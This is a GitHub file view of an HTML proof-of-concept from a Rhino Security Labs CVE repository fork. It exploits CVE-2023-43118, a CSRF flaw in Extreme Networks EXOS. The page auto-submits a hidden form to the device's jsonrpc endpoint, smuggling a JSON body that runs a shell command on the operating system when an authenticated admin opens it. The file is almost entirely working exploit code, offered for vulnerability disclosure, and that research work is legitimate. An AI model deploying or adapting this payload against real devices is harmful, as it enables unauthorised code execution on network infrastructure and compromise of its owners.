forked from RhinoSecurityLabs/CVEs
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2023-43118.html
More file actions
20 lines (20 loc) · 969 Bytes
/
Copy pathCVE-2023-43118.html
File metadata and controls
20 lines (20 loc) · 969 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<!--
Author: Dave Yesland @daveysec with Rhino Security Labs
CVE: CVE-2023-43118
This demonstrates a CSRF vulnerability in Extreme Networks EXOS v32.1.1.6
Opening this in a browser which is authenticated to an admin account in
EXOS Chalet web application will result in code execution on the OS
using the 'run script shell ls' command via the jsonrpc endpoint.
-->
<html>
<body>
<form action="http://<SERVER_IP_HERE>/jsonrpc/" method="POST" enctype="text/plain">
<input type="hidden" name="{"jsonrpc": "2.0","method": "cli","params":["run script shell ls"],"id":"1","x":"" value='"}' />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>